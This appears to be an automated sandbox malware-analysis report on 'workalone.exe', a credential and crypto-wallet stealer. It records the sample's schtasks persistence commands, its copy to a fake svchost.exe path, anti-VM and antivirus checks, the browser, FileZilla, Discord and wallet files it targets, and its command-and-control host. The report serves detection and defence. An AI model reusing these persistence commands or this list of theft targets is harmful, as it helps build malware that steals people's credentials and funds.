                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Users\user\Desktop\workalone.exe C:\Users\user\Desktop\workalone.exe
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchost
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\Desktop\workalone.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\Desktop\workalone.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\workalone.exeFile created: C:\Users\user\AppData\Roaming\svchostJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE6B7.tmpJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/29@5/1
                    Source: tmp1B45.tmp.1.dr, tmpE6B7.tmp.1.dr, tmpB641.tmp.1.dr, tmpB611.tmp.1.dr, tmp8319.tmp.1.dr, tmp82DA.tmp.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: workalone.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\workalone.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6124:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_01
                    Source: workalone.exe, u0087u0003/u0095u0003.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: workalone.exe, u0087u0003/u0095u0003.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: svchost.exe.7.dr, u0087u0003/u0095u0003.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: svchost.exe.7.dr, u0087u0003/u0095u0003.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: C:\Users\user\Desktop\workalone.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\workalone.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: workalone.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: workalone.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\workalone.exe | Code function: 0_2_00F81C57 push ebx; iretd
                    Source: initial sample | Static PE information: section name: .text entropy: 7.585773646811085

                    Persistence and Installation Behavior

                    Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\svchost\svchost.exe

                    Boot Survival

                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f

                    Hooking and other Techniques for Hiding and Protection

                    Source: unknown | Network traffic detected: HTTP traffic on port 49685 -> 46539
                    Source: unknown | Network traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknown | Network traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknown | Network traffic detected: HTTP traffic on port 49685 -> 46539
                    Source: unknown | Network traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknown | Network traffic detected: HTTP traffic on port 46539 -> 49685
                    Source: unknown | Network traffic detected: HTTP traffic on port 49687 -> 46539
                    Source: unknown | Network traffic detected: HTTP traffic on port 46539 -> 49687
                    Source: unknown | Network traffic detected: HTTP traffic on port 46539 -> 49687
                    Source: unknown | Network traffic detected: HTTP traffic on port 49688 -> 46539
                    Source: unknown | Network traffic detected: HTTP traffic on port 46539 -> 49688
                    Source: unknown | Network traffic detected: HTTP traffic on port 46539 -> 49688
                    Source: C:\Users\user\Desktop\workalone.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\workalone.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\workalone.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\Desktop\workalone.exe TID: 5856 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\workalone.exe TID: 5660 | Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\workalone.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\workalone.exe | Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\Desktop\workalone.exe | Window / User API: threadDelayed 9525
                    Source: C:\Users\user\Desktop\workalone.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\workalone.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\workalone.exe | Thread delayed: delay time: 922337203685477
                    Source: workalone.exe, svchost.exe.7.drBinary or memory string: objectmethodInvokenhffskdsfkdddafrffddhfscffdfhkgfsfdfdfhddrfahddsshcfchfdgeffkdafsfddhdshdghfBeginInvokeIAsyncResultAsyncCallbackcallbackEndInvokeresulthfsdkfdhgfshsefdfafffdchfhhfgsffrffdkdfcdshhfdasdfhfcfhdgadfdfrsfsshdkfffghhjfdffhfgadsfcrddfffskhjfsfhrgddddffffkhsjdfjsdfcfddshdfgfedfkfghjsddddffsheghddjffffffgjskdgsfacsafpsfhjfkfhgfhjsrfhddfhffadsfsfhsscfgdbddfrjfsffhgdfafcfdssfkfhgjffchkffgahffsrddsfsfjjffadsfcfdggsdehfsgkffjjcfssadghfffrfddsdgkfffffchkfhrfdfdafgsssffjjffaffffdrdgfhcsdsgkffjjcfhdsfrfgfdsadfsdgkffffgdddfdsfdhfssfdghfhfssddssdfhfddfhhshsfddsdfsdfdshshsdsffdsdsdfsdfsfhsdhffsdssfsshddsfgfsafsdgfsdshsgsfsfdsdgssdaffadssgsfashdsfsgfssadfsdggasdsfdfshsggdsdfafaghssddfdafsadsfdsfsddsjdddfsdsfgdfgfsssdfhjfsdsafdfhgjffddddsgfdgsjsfsddfdfjdffafgdfddsfddjkfdssfdfsgfhfssjfsffdfgsjfadsffffdfhfsfsfsjsffsfdssdjdsdffffsskwssffssdvgsffffsdsgffssfddsxstartupInfoSkikgmgIdajdfhfdfdffdffssdkfjhdfffdfhffsassdkfshhdffhdfsdhdffdfkdfaffdssdfffhhfhhsdfffdsshfffdhfhffdsffdfshfsdhshhhgfdffffdfsfhsfdfsffhfffdhsfddsffhssffdhdfffhhfdhsdffsfjhffsdffdfdhiCreateMemberRefsDelegatestypeIDCreateGetStringDelegateownerType
                    Source: workalone.exe, svchost.exe.7.dr | Binary or memory string: hfsdkfdhgfshsefdfafffdch
                    Source: C:\Users\user\Desktop\workalone.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\workalone.exe | Code function: 1_2_065EC798 LdrInitializeThunk,
                    Source: C:\Users\user\Desktop\workalone.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\workalone.exe | Memory written: C:\Users\user\Desktop\workalone.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\workalone.exe | Process created: C:\Users\user\Desktop\workalone.exe C:\Users\user\Desktop\workalone.exe
                    Source: C:\Users\user\Desktop\workalone.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchost
                    Source: C:\Users\user\Desktop\workalone.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\Desktop\workalone.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\Desktop\workalone.exe | Queries volume information: C:\Users\user\Desktop\workalone.exe VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exe | Queries volume information: C:\Users\user\Desktop\workalone.exe VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\workalone.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\Desktop\workalone.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\workalone.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\workalone.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\workalone.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\workalone.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\workalone.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: workalone.exe, 00000001.00000003.372984422.0000000006925000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: workalone.exe PID: 5836, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: workalone.exe PID: 5956, type: MEMORYSTR
Source: C:\Users\user\Desktop\workalone.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\Desktop\workalone.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: #l1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: \Ethereum\wallets
Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Ethereum
Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: #l5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: C:\Users\user\Desktop\workalone.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\workalone.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: workalone.exe PID: 5836, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: workalone.exe PID: 5956, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: workalone.exe PID: 5836, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: workalone.exe PID: 5956, type: MEMORYSTR
MITRE ATT&CK Matrix (listed per tactic; bracketed numbers are the hit badges shown on the flagged cells)

Initial Access: Valid Accounts [1]; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation [221]; Scheduled Task/Job [1]; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: Valid Accounts [1]; Scheduled Task/Job [1]; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: Valid Accounts [1]; Access Token Manipulation [1]; Process Injection [111]; Scheduled Task/Job [1]; Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: Masquerading [11]; Valid Accounts [1]; Access Token Manipulation [1]; Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [231]; Process Injection [111]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [2]
Credential Access: OS Credential Dumping [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: Security Software Discovery [231]; Process Discovery [11]; Virtualization/Sandbox Evasion [231]; Application Window Discovery [1]; Remote System Discovery [1]; System Information Discovery [123]; Network Sniffing; Network Service Scanning; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data [11]; Data from Local System [3]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel [1]; Non-Standard Port [11]; Non-Application Layer Protocol [2]; Application Layer Protocol [22]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
Behavior Graph (ID: 756291, Sample: workalone.exe, Startdate: 30/11/2022, Architecture: WINDOWS, Score: 100)
Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 9 other signatures
workalone.exe (started): dropped C:\Users\user\AppData\...\workalone.exe.log (ASCII); signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Injects a PE file into a foreign processes; starts a second workalone.exe and three cmd.exe instances
  workalone.exe (child): DNS/IP: saleshor12.duckdns.org 85.208.136.178, 46539, 49685, 49687 CMCSUS Germany; api.ip.sb; signatures: Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets; starts conhost.exe
  cmd.exe (1): signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Drops PE files with benign system names; starts conhost.exe
  cmd.exe (2): dropped C:\Users\user\AppData\Roaming\...\svchost.exe (PE32) and C:\Users\user\...\svchost.exe:Zone.Identifier (ASCII); starts conhost.exe
  cmd.exe (3): starts conhost.exe and schtasks.exe

Source | Detection | Scanner | Label
workalone.exe | 100% | Avira | HEUR/AGEN.1235903
workalone.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\svchost\svchost.exe | 100% | Avira | HEUR/AGEN.1235903
C:\Users\user\AppData\Roaming\svchost\svchost.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
0.0.workalone.exe.590000.0.unpack | 100% | Avira | HEUR/AGEN.1235903
1.0.workalone.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1234943
Source | Detection | Scanner | Label
api.ip.sb | 2% | Virustotal |
Source | Detection | Scanner | Label
http://ns.adobe.cobj | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/CheckConnectResponse | 0% | URL Reputation | safe
http://schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/EnvironmentSettings | 0% | URL Reputation | safe
http://tempuri.org/t_ | 0% | URL Reputation | safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | URL Reputation | safe
http://tempuri.org/ | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/CheckConnect | 0% | URL Reputation | safe
http://ns.adobe.c/g | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/VerifyUpdateResponse | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/SetEnviron | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/SetEnvironment | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/SetEnvironmentResponse | 0% | URL Reputation | safe
http://saleshor12.duckdns.org:46539 | 0% | Avira URL Cloud | safe
http://saleshor12.duckdns.org:46539/ | 0% | Avira URL Cloud | safe
saleshor12.duckdns.org:46539 | 0% | Avira URL Cloud | safe
http://tempuri.org/Endpoint/GetUpdates | 0% | URL Reputation | safe
http://saleshor12.duckdns.org | 0% | Avira URL Cloud | safe
https://api.ipify.orgcookies//settinString.Removeg | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/GetUpdatesResponse | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse | 0% | URL Reputation | safe
http://tempuri.org/Endpoint/VerifyUpdate | 0% | URL Reputation | safe
http://tempuri.org/0 | 0% | URL Reputation | safe
http://ns.ado/1 | 0% | URL Reputation | safe
http://saleshor12.duckdns.org: | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
saleshor12.duckdns.org | 85.208.136.178 | true | true | | unknown
api.ip.sb | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://saleshor12.duckdns.org:46539/ | true | Avira URL Cloud: safe | unknown
saleshor12.duckdns.org:46539 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ipinfo.io/ip%appdata% | workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
